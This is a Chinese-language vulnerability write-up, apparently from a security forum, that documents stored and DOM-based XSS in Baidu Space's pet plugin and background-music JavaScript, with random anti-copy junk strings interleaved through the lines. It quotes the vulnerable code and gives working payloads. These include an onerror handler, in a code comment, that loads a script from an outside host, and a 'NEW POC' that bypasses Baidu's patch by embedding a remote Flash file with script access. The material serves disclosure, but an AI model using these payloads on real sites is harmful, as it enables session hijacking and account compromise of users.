百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS. + _1 S% v4 Q' \
! ^) J& n H3 k. V* Z& M
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
3 Z) N4 o' P; O. F7 g2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 ' @$ [# S2 t# W: Q _
7 n" X# O* a) l$ E0 K将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
; Z) T( H: U4 j: |) a9 `- T6 h其中BdUtil.insertWBR为
& f' S7 Z. b& L+ ^% Q2 a- Yfunction(text, step) {
% S. i& y, ]: _ var textarea = textAreaCache || getContainer();
- a7 ^* W2 ]0 I) @9 ^) n5 B: j" u if (!textarea) {
6 m& o F7 O+ y1 ?1 f% S w" A& H return text;
! a0 W8 U- I1 B ]& U( u9 j }
2 `+ x& N$ \, x/ S3 [ textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 2 d+ M/ Q( c- l9 s0 ^: u
var string = textarea.value;
7 D* l! [3 j8 ?" {, o! e- N* j var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi"); + R5 Q3 u4 p- L' F" S
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
: ^+ H3 N) q- |; O return result;
7 T: L# ~( U* G* f6 G} 3 X) H" b& t; w' n
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. & c, u/ n1 O! ~* j1 M& d5 D
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
) y2 B: M& ~. f2 |! I" F% J1 C7 x 2 k& ]4 G) U+ I
二:creatbgmusic() Dom-Xss Bug & D( B% I) d6 E
百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 / S+ ]7 D3 z- s; Q* H j {+ w
8 y' |9 |' s7 v. @在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: % E/ \7 G/ y$ f t" _
1 Q$ X2 C; f% Y' v. F0 hfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { ( J3 a: l6 l2 L6 a) `, _+ P7 \& A
//传入的murl赋值到bgmusic1和bgmusic2中 2 c+ Q' z0 L i3 P8 Q
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 E' T0 `8 s4 |/ X
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
5 u3 g2 c) j: g if (musicnum <= 1) { 1 N' K5 s) u3 S9 n
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
5 [- D% M; j; y' l0 h } ( M0 L; Z4 m9 [( u1 L1 k5 o" |2 j
bgmusic1 += "</OBJECT>"; 3 X) O% l2 Y& N7 N6 b
var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
: f, h& D. J6 u' V" V6 T9 o if (musicnum <= 1) { ; @! F3 i# c, G; h V
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; * Q! G: H- {% v3 t0 m. l
}
3 i; @7 ?4 W5 J5 A0 z& `. I9 f bgmusic2 += "> </EMBED>";
6 n4 H$ E/ q0 C* e5 D: c. ~+ ` var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; : E8 r" W( h# [/ S4 ~! G
var bgmus = detectWMP(); & q8 W- ^2 {3 | A$ i6 k5 U
if (functype == "FckMusicHelper") {
' L$ ~2 |$ c. b if (bgmus.installed) {
* P! T* O* M1 ], O* p9 | if (bgmus.type == "IE") { ) v, Q* [. g/ _! e& Y
return bgmusic1;
' S7 O" U W8 c } else if (bgmus.type == "NS") { " H- c* K9 w7 O; }5 M& S
return bgmusic2; 1 D) S5 S% R( [' |
}
# d; C$ p& [6 {% u0 [1 g' \ } else { ; ^1 G7 V, x2 ]2 `
return bgmusic3;
; s8 u/ \3 K ^( K: G% Z) ]- [ }
0 _2 v5 F$ v* ~1 o } else { ( v& H) K6 p! c4 L/ b5 m. Y
if (bgmus.installed) {
) t& a' R$ g& o: y* a% V2 L //document.write 直接输出bgmusic变量 导致xss 4 J0 F4 w( B, {
if (bgmus.type == "IE") { $ f. a( Y. m: O% w# H
document.write(bgmusic1); " E9 A0 L/ ~( A: ~( b/ \
} else if (bgmus.type == "NS") { " S+ e" g. l2 x1 W! E
document.write(bgmusic2); 6 v, y) {: j, b7 [6 a
} " v- ~; u& m/ {
} else {
2 k& g, p; I1 s- d+ c$ M3 F document.write(bgmusic3);
9 X3 a. P3 V* c2 v' d6 q0 o }
4 E3 x4 a: M! b return "";
/ z0 d* ?6 W9 M5 s- v* f } ' ]8 X+ e4 e+ V* y% T2 U
} 8 O3 T6 _" H( z L M/ |6 Z- ]: C
# c4 [/ D4 A- G在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: 1 L9 G. R/ I" c& k- y. T' ~
6 s/ T+ @" z1 N3 ~8 s- `/ }' K) d
function initBlogTextForFCK(){ 0 O% w( u% O( h9 B. `3 Q
//fck init music 5 D( P! Y; a$ C9 r
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}} 9 E' T9 S2 Y% t& F
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
* x: m5 R& n/ p( z) x6 p( yvar isAutoPlay=true;
: S. Y) i) c5 {for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. - ^: `. X p- J! V
var img=imgBox;
& h' K @8 w8 I$ U" O' B+ n% _1 B if(img.getAttribute(’rel’)){ 0 K' t$ X9 l* x0 N. J+ |$ p
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc 8 S1 f& M, f4 B/ k8 V% X
var musicDiv = document.createElement("SPAN"); * N" [; q5 Q3 a+ i
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
9 [, |8 w; L; N2 E- ]& f7 X" f # l% V* d& v/ @! u
..........................
# ^5 v; o9 D; d4 G . l- _9 Q9 u9 a( Y# x
//直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来. ) w1 o; [ P4 T+ ?$ r; @
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
+ t! Z( P% P1 {8 V4 w9 E shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
" p2 c7 E, j" l1 k8 `, W musicDiv.innerHTML=shtml;
! u, Z6 w4 c' k3 f i--;n--;
6 `% P7 |0 B- x( X- F5 r! X+ d$ M }
) @8 U2 |5 B$ j: I8 R. l}
5 j" |0 s& o T1 C6 T8 I3 K. J3 ?" g4 w8 k
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
7 d, z/ C" l6 u/ F* m ( T0 [. O" m/ q% d
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
) Q1 ]! n( P: n) E! ]* w- m
; |1 D2 }" V/ D, g* y( ]7 Z S) V等待官方补丁
6 H* d- q- F A
" [2 |2 ? J: j( m- r2 iupdate 2010年5月13日 - A1 L) c6 E" U6 s3 i* T: O4 e& R
/ A* K+ t- N: F官方补丁: : E4 O T- `! C) L
1 c+ h7 X. w" u3 v7 O& J- g$ V
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 6 o' k( [# d6 d+ Y
改为:
% ]9 c1 t: @0 t6 K9 G% ivar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
; u. P% L. g& ^+ ^, L& Q C6 _7 J* j, _$ V% R
update 2010年5月13日 21:50:37
- i3 I, ]6 \4 }: {: m s" _" k! j! A- s- A, N; }4 ]$ ^
补丁存在漏洞 没有过滤" 可以继续跨:
/ _, e. A7 D2 Y6 F c2 Z/ k( k6 g, f
NEW POC: 5 o) T7 I" U7 D! d
! c; `- n3 D# w
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf"
6 p7 g+ t+ a+ h3 a6 ?" O/ S3 I5 b3 a$ @* Q$ o
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>, W( z! I6 {5 z4 [" v
$ {# e. L" f, H8 i' s6 R
|